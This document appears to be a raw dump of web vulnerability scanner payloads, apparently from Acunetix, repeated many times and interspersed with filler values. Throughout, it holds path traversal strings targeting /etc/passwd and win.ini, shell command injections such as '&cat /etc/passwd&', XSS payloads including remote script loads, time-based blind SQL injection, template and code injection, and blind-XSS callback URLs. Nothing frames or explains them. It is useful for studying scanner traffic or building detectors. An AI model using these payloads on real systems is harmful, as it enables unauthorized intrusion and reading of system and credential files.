../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943222)>

1

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(939647)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

${99829+99415}

1<img/src=">" onerror=alert(972068)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1

1

1<ScRiPt%20>prompt(920255)</sCripT>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n978839=v924716

|cat /etc/passwd#

1

1&lt

-1)

testasp.vulnweb.com

)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

-1))

\xf6<img acu onmouseover=prompt(979506) //\xf6>

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

DkUlammz'

1

^(#$!@#$)(()))******

"|"ld

1<input autofocus onfocus=prompt(992008)>

1

NIF8yODu')

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

1

9kWZCzP1'))

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

'

'

1

1

[url=http://www.acunetix.com]website security[/url]

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1_Kp1Ih <ScRiPt >prompt(949678)</ScRiPt>

1

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

http://hit0Dm9agQqUk.bxss.me/

-1))

acunetix_wvs_invalid_filename

1

1

comments

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

CVTlDzcI'

1

'&dir&'

1

comments

1

1

1

tWZficO3')

1

http://www.acunetix.tst

1

comments/.

"&dir&"

file:///etc/passwd

'"

VAywfRIo'))

1'"()&%<ScRiPt >prompt(960092)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

|dir

1

'"()&%<ScRiPt >prompt(925907)</ScRiPt>

1

1

1

1

'|dir

WEB-INF/web.xml

1

1_983896

1

1

1

"|dir

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu5144\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5144

1

................windowswin.ini

acux4035\xc0\xbez1\xc0\xbcz2a\x90bcxuca4035

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(957614)</ScRiPt>

1

1

1

1<script>prompt(984433)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(959170)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983595></ScRiPt>

1

1

response.write(9861106*9416321)

1

1<ScRiPt >prompt(990894)</ScRiPt>

1

1

&cat /etc/passwd&

'+response.write(9861106*9416321)+'

1<video><source onerror="javascript:prompt(905955)">

1

WEB-INF/web.xml

'&cat /etc/passwd&'

1

"+response.write(9861106*9416321)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987658)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(967380))>

WEB-INF\web.xml

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(943435)>

1

`cat /etc/passwd`

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

${99653+99144}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965357)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

-1

1

1<img src=xyz OnErRor=prompt(986647)>

1

1

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n933530=v994387

1

1<img/src=">" onerror=alert(912802)>

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1<ScRiPt%20>prompt(981720)</sCripT>

1

'"()

1

!(()&&!|*|*|

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

Lo76dU8e'

1

1

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

'

3G0NfOug')

1

\xf6<img acu onmouseover=prompt(943104) //\xf6>

/etc/passwd

1

1

"

1

1

"

1<input autofocus onfocus=prompt(934104)>

1

9efbTnNK'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

http://hitu9pcOqoK3e.bxss.me/

acunetix_wvs_invalid_filename

1

-1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

comments

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1_4jyQd <ScRiPt >prompt(903424)</ScRiPt>

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

1

1

'&dir&'

1

comments/.

http://www.acunetix.tst

1

D8yZstKw'

'"

1

1

1'"()&%<ScRiPt >prompt(903076)</ScRiPt>

1

cmc6I1yl')

"&dir&"

file:///etc/passwd

1

<!--

1

'"()&%<ScRiPt >prompt(927840)</ScRiPt>

1

1

Q5EoguP4'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1_927091

1

1

1

1

WEB-INF/web.xml

1

'|dir

1

1

WEB-INF\web.xml

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

acu8788\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8788

1

1

acux6841\xc0\xbez1\xc0\xbcz2a\x90bcxuca6841

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(928409)</ScRiPt>

1

1

1

1<script>prompt(993018)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9286584*9164592)

1

1

1<ScRiPt >prompt(988459)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9286584*9164592)+'

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978199></ScRiPt>

"+response.write(9286584*9164592)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1<ScRiPt >prompt(938825)</ScRiPt>

../../../../../../../../../../etc/passwd

1

1

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(910172)">

1

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(968007)"></g></svg>

WEB-INF\web.xml

1

1

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

${99131+99214}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<div style=width:expression(prompt(938908))>

"&cat /etc/passwd&"

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1some_inexistent_file_with_long_name%00.jpg

1<iframe src='data:text/html

cat /etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1&n993929=v957622

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<body onload=prompt(926485)>

1

`cat /etc/passwd`

1

-1)

testasp.vulnweb.com

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981349)>

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

|cat /etc/passwd#

1

1

-1))

1<img src=xyz OnErRor=prompt(986325)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

0YMJR5Gi'

'"()

'|'ld

1

1<img/src=">" onerror=alert(965098)>

1

1

/etc/passwd

SnPQEdFB')

1

'

1<ScRiPt%20>prompt(959041)</sCripT>

1

^(#$!@#$)(()))******

"|"ld

1

1

3I0uuMuG'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1&lt

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

\xf6<img acu onmouseover=prompt(908473) //\xf6>

-1)

1

'

http://hityvzzGtDSsA.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

1

-1))

1

1<input autofocus onfocus=prompt(923612)>

1

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

Y2NgEHnQ'

1

1

||cat /etc/passwd

http://www.acunetix.tst

1

'"

file:///etc/passwd

comments

1

L6mitscr')

<a href='http://www.acunetix.com'>website security</a>

1

1'"()&%<ScRiPt >prompt(998770)</ScRiPt>

&dir

<!--

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

0zRm8Eyr'))

'"()&%<ScRiPt >prompt(952554)</ScRiPt>

1

1

'&dir&'

1

[url=http://www.acunetix.com]website security[/url]

1

1

WEB-INF/web.xml

1

1_977159

1

1_QTsGn <ScRiPt >prompt(919077)</ScRiPt>

1

WEB-INF\web.xml

"&dir&"

1

1

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

1

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu3861\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3861

................windowswin.ini

1

1

1

acux3893\xc0\xbez1\xc0\xbcz2a\x90bcxuca3893

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(981903)</ScRiPt>

1

1

1<script>prompt(920266)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(956251)</ScRiPt>

1

response.write(9097703*9160466)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956375></ScRiPt>

1

1

1

1

'+response.write(9097703*9160466)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(935114)</ScRiPt>

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

"+response.write(9097703*9160466)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<video><source onerror="javascript:prompt(931697)">

1

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(996870)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1<div style=width:expression(prompt(969494))>

WEB-INF\web.xml

"&cat /etc/passwd&"

1

1

1

1

1

1<iframe src='data:text/html

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(991384)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99204+99982}

cat /etc/passwd

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(937338)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n927239=v907798

1<img src=xyz OnErRor=prompt(952515)>

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

|cat /etc/passwd#

1

1

1<img/src=">" onerror=alert(922674)>

-1))

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

vOaZEg51'

testasp.vulnweb.com

'"()

1<ScRiPt%20>prompt(934552)</sCripT>

1

'|'ld

1

1

1

ylYWxJbg')

1

/etc/passwd

1

1&lt

'

"|"ld

1

1

1

1

f40BpMDh'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

\xf6<img acu onmouseover=prompt(970525) //\xf6>

1

"

-1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(936509)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

http://hitpNW5k7i4l2.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

1

AMbsf2I9'

1

1_xLFiN <ScRiPt >prompt(945490)</ScRiPt>

"

1

comments

file:///etc/passwd

1

http://www.acunetix.tst

zzDvEb0h')

'"

||cat /etc/passwd

1

1'"()&%<ScRiPt >prompt(923999)</ScRiPt>

comments

/\../\../\../\../\../\../\../etc/passwd

<!--

1

f39OmZHZ'))

1

WEB-INF/web.xml

1

&dir

'"()&%<ScRiPt >prompt(991033)</ScRiPt>

1

comments/.

1

1

Yvivuh55'))

1

1

1

1_975074

'&dir&'

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

"&dir&"

1

1

1

|dir

../../../../../../../../../../boot.ini

1

1

'|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu2583\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2583

1

................windowswin.ini

1

acux4474\xc0\xbez1\xc0\xbcz2a\x90bcxuca4474

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(967679)</ScRiPt>

1

1

1<script>prompt(915277)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(982109)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927735></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(907568)</ScRiPt>

response.write(9439575*9333118)

1

1

1

1

1<video><source onerror="javascript:prompt(939174)">

'+response.write(9439575*9333118)+'

1

&cat /etc/passwd&

1

1

"+response.write(9439575*9333118)+"

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959489)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

1<div style=width:expression(prompt(920454))>

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1<iframe src='data:text/html

1

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3.109),0)/*'XOR(if(now()=sysdate(),sleep(3.109),0))OR'"XOR(if(now()=sysdate(),sleep(3.109),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(951226)>

1

1

1

(select(0)from(select(sleep(3.109)))v)/*'+(select(0)from(select(sleep(3.109)))v)+'"+(select(0)from(select(sleep(3.109)))v)+"*/

`cat /etc/passwd`

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(908175)>

${99970+99774}

1

1

|cat /etc/passwd#

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(916885)>

1&n957604=v985284

1

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

-1)

1

1<img/src=">" onerror=alert(961432)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"|"ld

-1))

1<ScRiPt%20>prompt(976531)</sCripT>

testasp.vulnweb.com

!(()&&!|*|*|

1

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

VrVr5wdj'

^(#$!@#$)(()))******

1

1&lt

'

1

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

t3CSWi9g')

1

1

\xf6<img acu onmouseover=prompt(961726) //\xf6>

/etc/passwd

1

"

"

1

1

CcVj6Nom'))

1

1

1<input autofocus onfocus=prompt(954194)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

-1

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1)

1

http://hit6eT6v9CASd.bxss.me/

&dir

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

1

1

1_mQzRF <ScRiPt >prompt(949340)</ScRiPt>

comments

1

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

9t1cOy50'

1'"()&%<ScRiPt >prompt(912167)</ScRiPt>

1

comments

http://www.acunetix.tst

1

'"

"&dir&"

1

1

'"()&%<ScRiPt >prompt(947739)</ScRiPt>

comments/.

2jToqLLd')

|dir

1

<!--

1

1

file:///etc/passwd

1

1

LRa8BWDa'))

1_998845

1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu2005\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2005

../../../../../../../../../../windows/win.ini.jpg

1

acux10942\xc0\xbez1\xc0\xbcz2a\x90bcxuca10942

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(990208)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(983552)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(926340)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960865></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(981191)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(978381)">

response.write(9269910*9758201)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934242)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9269910*9758201)+'

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(961339))>

1

"+response.write(9269910*9758201)+"

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

1

WEB-INF/web.xml

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(964701)>

1

WEB-INF\web.xml

1

1

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(926881)>

`cat /etc/passwd`

${100348+99178}

1

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(952609)>

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n953193=v970080

)

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(910952)>

-1))

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1<ScRiPt%20>prompt(939011)</sCripT>

iwoevliL'

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

YQo2FAc1')

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

4aC0T3pr'))

1

1

1

/etc/passwd

\xf6<img acu onmouseover=prompt(977153) //\xf6>

1

"

1

1

1

'

1

-1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitHDlfEKvyhe.bxss.me/

1

1<input autofocus onfocus=prompt(935155)>

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

"

-1)

1

1

1

<a href='http://www.acunetix.com'>website security</a>

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

1

1

||cat /etc/passwd

1

comments

mRZkrrAB'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_pGpOV <ScRiPt >prompt(948203)</ScRiPt>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

npQ90Lqu')

&dir

http://www.acunetix.tst

'"

1

1

1

1

C4BrJCuu'))

1

'&dir&'

<!--

1

1

1'"()&%<ScRiPt >prompt(989061)</ScRiPt>

1

file:///etc/passwd

1

1

1

1

'"()&%<ScRiPt >prompt(913573)</ScRiPt>

"&dir&"

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1_971255

1

|dir

1

1

WEB-INF/web.xml

1

'|dir

WEB-INF\web.xml

../../../../../../../../../../windows/win.ini

"|dir

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu2860\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2860

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux6450\xc0\xbez1\xc0\xbcz2a\x90bcxuca6450

................windowswin.ini

1

1

1<ScRiPt >prompt(996258)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(996918)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(987419)</ScRiPt>

1

1

response.write(9990914*9714155)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910592></ScRiPt>

1

1

'+response.write(9990914*9714155)+'

1<ScRiPt >prompt(911651)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

